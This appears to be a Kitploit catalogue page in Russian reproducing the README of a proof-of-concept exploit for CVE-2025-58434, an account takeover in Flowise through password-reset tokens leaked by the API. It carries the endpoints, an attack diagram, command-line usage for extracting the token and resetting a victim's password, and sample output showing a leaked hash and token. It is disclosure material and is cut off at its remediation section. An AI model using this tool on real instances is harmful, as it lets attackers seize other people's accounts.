Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-58434-poc — Эксплойт для проверки концепции для CVE-2025-58434, демонстрирующий несанкционированный захват учетных записей в Flowise через утекшие токены сброса пароля. Включает двухэтапную атаку: утечка токена и сброс пароля. | Kitploit
Инструменты/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Эксплойт для проверки концепции для CVE-2025-58434, демонстрирующий несанкционированный захват учетных записей в Flowise через утекшие токены сброса пароля. Включает двухэтапную атаку: утечка токена и сброс пароля.

Репозиторий
1465 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-58434 — Захват учетной записи Flowise через утечку токена

CVE CVSS Python Лицензия Раскрытие

⚠️ Этот репозиторий предназначен только для образовательных целей и авторизованных исследований безопасности.
Несанкционированное использование против систем, которыми вы не владеете или не имеете явного разрешения на тестирование, незаконно.


Содержание

  • Обзор
  • Детали уязвимости
  • Сценарий атаки
  • Затронутые версии
  • Структура репозитория
  • Требования
  • Установка
  • Использование
  • Пример вывода
  • Устранение
  • График раскрытия
  • Ссылки
  • Отказ от ответственности

Обзор

Конечная точка forgot-password в Flowise (как в облачной, так и в локальной версии) возвращает действующий токен сброса пароля (tempToken) непосредственно в теле HTTP-ответа — без какой-либо проверки email или аутентификации.

Это означает, что злоумышленник, знающий (или способный угадать) адрес электронной почты жертвы, может:

  1. Вызвать конечную точку forgot-password → получить tempToken в JSON-ответе
  2. Использовать tempToken для вызова reset-password → установить произвольный новый пароль
  3. Войти в систему под видом жертвы → полный захват учетной записи (ATO)

Никакого предварительного доступа, взаимодействия с пользователем или доступа к email не требуется.


Детали уязвимости

ПолеЗначение
CVE IDCVE-2025-58434
CVSS Score9.8 (Critical)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-640: Слабый механизм восстановления пароля
ТипОбход аутентификации / Небезопасная прямая ссылка на объект
Затронутое приложениеFlowise (облачная + локальная версия)
Конечная точка 1POST /api/v1/account/forgot-password
Конечная точка 2POST /api/v1/account/reset-password

Корневая причина

Обработчик forgot-password возвращает всю запись пользователя — включая сгенерированный tempToken — непосредственно в ответе API вместо того, чтобы только отправить его на зарегистрированный адрес электронной почты пользователя.

{
  "user": {
    "id": "<uuid>",
    "name": "Victim Name",
    "email": "[email protected]",
    "credential": "<bcrypt-hash>",
    "tempToken": "<LEAKED_TOKEN_HERE>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

Сценарий атаки

Злоумышленник                        API Flowise
   │                                       │
   │  POST /forgot-password {email}        │
   │──────────────────────────────────────►│
   │                                       │  (генерирует tempToken)
   │◄──────────────────────────────────────│
   │  201 { tempToken: "abc123..." }       │
   │                                       │
   │  POST /reset-password {email,         │
   │         tempToken, newPassword}       │
   │──────────────────────────────────────►│
   │                                       │
   │◄──────────────────────────────────────│
   │  200 OK  (пароль изменен!)            │
   │                                       │
   ✓  Захват учетной записи завершен

Затронутые версии

  • Flowise Cloud (cloud.flowiseai.com) — подтверждено, что уязвима
  • Все локальные развертывания Flowise до выпуска патча

Проверьте официальный GitHub Flowise для получения информации о выпущенном патче.


Структура репозитория

CVE-2025-58434/
├── cve_2025_58434_poc.py   # Основной скрипт PoC (двухэтапный ATO)
├── requirements.txt         # Зависимости Python
├── README.md                # Этот файл
└── DISCLAIMER.md            # Правовое уведомление (прочитайте перед использованием)

Требования

  • Python 3.7 или выше
  • Библиотека requests

Установка

# Клонировать репозиторий
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434

# Установить зависимости
pip install -r requirements.txt

Использование

Справка

python3 cve_2025_58434_poc.py --help

Этап 1 — Утечка токена (разведка)

Подтвердить, что экземпляр уязвим, и получить tempToken без сброса пароля.

python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected]

Этап 2 — Полный захват учетной записи

Использовать утекший токен для немедленного сброса пароля.

python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --reset \
  --new-password "MyNewP@ss2025!"

Вывод сырого JSON-ответа

python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --json-output

Все опции

ФлагСокращениеОписаниеЗначение по умолчанию
--url URL-uБазовый URL экземпляра Flowise(обязательно)
--email EMAIL-eАдрес электронной почты целевой учетной записи(обязательно)
--reset-rВыполнить Этап 2: сбросить пароль с помощью утекшего токенаFalse
--new-password PASS-pНовый пароль для установки (используется с --reset)Changeme@2025!
--timeout SECONDS-tТайм-аут HTTP-запроса10
--json-output-jВывести сырой JSON-ответ API в stdoutFalse

Пример вывода

  [Шаг 1] Отправка запроса forgot-password …
  [*] HTTP Status : 201

  ========================================================================
    УТЕКШИЕ ДАННЫЕ УЧЕТНОЙ ЗАПИСИ
  ========================================================================
    ID пользователя : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
    Имя            : Admin User
    Email          : [email protected]
    Учетные данные : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Статус         : active
    tempToken      : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
    tokenExpiry    : 2025-08-19T13:00:33.834Z
  ========================================================================

  [+] tempToken получен  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  [!] УЯЗВИМО: Экземпляр раскрывает токены сброса пароля без аутентификации!

Устранение

Если вы оператор экземпляра Flowise, немедленно примените следующие меры:

Скачать инструмент